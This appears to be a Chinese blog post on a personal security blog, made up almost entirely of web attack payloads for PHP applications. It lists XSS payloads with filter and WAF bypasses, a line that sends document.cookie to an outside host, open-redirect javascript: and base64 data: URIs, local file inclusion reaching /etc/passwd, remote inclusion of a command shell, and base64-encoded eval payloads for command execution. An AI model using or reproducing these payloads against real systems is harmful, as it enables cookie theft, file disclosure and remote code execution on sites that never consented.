Sh4dow's Blog

例子：<script> ...  setTimeout ( \ " writetitle () \ ", $_GET[ xss ] ) ... </script>

利用：?xss=500); alert(document.cookie);//

<script> ... eval($_GET[xss]); ... </script>

/?xss=document.cookie

重定向：

header('Location: '.$_GET['param']);

header('Refresh: 0; URL='.$_GET['param']);

/?param=javascript:alert(document.cookie)

通过WAF和XSS攻击会在某些浏览器进行（Opera, Safary，Chrom）

/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

过滤fifler

<img src="x:alert" onerror="eval(src%2b'(0)')">

";document.write('<img sr'%2b'c=https://sh4dow.lofter.com/x.png?'%2bdocument['cookie']%2b'>');"

LFI利用：

源码:

<? include($_GET['file'].".txt") ;?>

index.php?file=myfile

利用： 

index.php?file=/../../../../../etc/passwd%00

本机包含:index.php?file=img/command_shell.jpg%00

远程包含:index.php?file=https://sh4dow.lofter.com/command_shell

文件遍历

<? include("./files/".$_GET['file']) ;?>

 

/?id=/union%20select/../../../../../../../etc/passwd

<? include("./files//uniX on%20sel X ect/../../../../../../../etc/passwd") ;?>

命令执行：

<? include($_GET['file'].".txt") ;?>

?file=data:,<?php eval($_REQUEST[cmd]);?>&cmd=phpinfo();

转换一下WAF:

/?file=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8%2b&cmd=phpinfo();